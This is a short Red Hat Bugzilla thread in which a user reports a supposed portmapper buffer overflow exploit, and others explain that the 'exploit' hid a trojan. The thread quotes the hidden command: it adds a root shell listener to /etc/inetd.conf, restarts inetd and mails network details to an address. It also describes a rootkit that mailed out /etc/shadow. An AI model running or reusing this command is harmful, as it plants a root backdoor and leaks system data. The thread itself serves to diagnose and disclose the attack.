Red Hat Bugzilla – Bug 21183
portmapper buffer overflow
Last modified: 2007-04-18 12:29:58 EDT
Our system was hit by this exploit. I don't see any bug report related to it.
This is no portmap exploit. There's a trojan hidden in the shellcode which tries to
add a backdoor in /etc/inetd.conf.
So, someone ran a trojan on your system? I'm not sure I understand
what you're trying to report.
I think he found the exploit from somewhere, decided to try it on a system or
two but got trojaned himself..
The "exploit" script calls system with:
/bin/echo "65139 stream tcp nowait root /bin/sh sh -i" >> /etc/inetd.conf ;
/bin/killall -1 inetd 2>&1 1>/dev/null ; /sbin/ifconfig -a | mail
email@example.com 2>&1 2>/dev/null
this system call is disguised as a pmap_proc_p call (and pmap_proc_p is defined
Apparently I did not read the comments close enough and did not see that it was a trojan. I've since found that we were rooted by a ftpd buffer overflow.
The rootkit the attacker used added the root shell to inetd.conf and mailed the IP address and /etc/shadow of the machine.